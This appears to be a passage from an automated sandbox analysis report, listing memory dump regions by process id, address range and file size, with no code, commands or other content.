                                                                    • memory/2280-202-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2280-197-0x000000000041C5CE-mapping.dmp

                                                                    • memory/2280-196-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2348-298-0x000000001AB00000-0x000000001AB02000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2348-299-0x000000001AB04000-0x000000001AB06000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2356-226-0x0000000000406200-mapping.dmp

                                                                    • memory/2420-205-0x0000000000000000-mapping.dmp

                                                                    • memory/2484-223-0x00000000004C0000-0x00000000004C1000-memory.dmp

                                                                      Filesize

                                                                      4KB

                                                                    • memory/2484-218-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2484-211-0x000000000041C5F6-mapping.dmp

                                                                    • memory/2484-209-0x0000000000400000-0x0000000000422000-memory.dmp

                                                                      Filesize

                                                                      136KB

                                                                    • memory/2508-212-0x0000000000000000-mapping.dmp

                                                                    • memory/2536-250-0x0000000000000000-mapping.dmp

                                                                    • memory/2544-284-0x0000000000000000-mapping.dmp

                                                                    • memory/2584-303-0x000000001B060000-0x000000001B062000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2584-309-0x000000001B066000-0x000000001B085000-memory.dmp

                                                                      Filesize

                                                                      124KB

                                                                    • memory/2604-222-0x0000000000000000-mapping.dmp

                                                                    • memory/2676-230-0x000007FEFB531000-0x000007FEFB533000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/2676-229-0x0000000000000000-mapping.dmp

                                                                    • memory/2764-288-0x0000000000000000-mapping.dmp

                                                                    • memory/2772-231-0x0000000000000000-mapping.dmp

                                                                    • memory/2788-232-0x0000000000000000-mapping.dmp

                                                                    • memory/2788-260-0x0000000000000000-mapping.dmp

                                                                    • memory/2836-234-0x0000000000000000-mapping.dmp

                                                                    • memory/2860-235-0x0000000000000000-mapping.dmp

                                                                    • memory/2908-263-0x0000000000000000-mapping.dmp

                                                                    • memory/2916-262-0x0000000000000000-mapping.dmp

                                                                    • memory/3040-335-0x000000001A790000-0x000000001A792000-memory.dmp

                                                                      Filesize

                                                                      8KB

                                                                    • memory/3040-336-0x000000001A794000-0x000000001A796000-memory.dmp

                                                                      Filesize

                                                                      8KB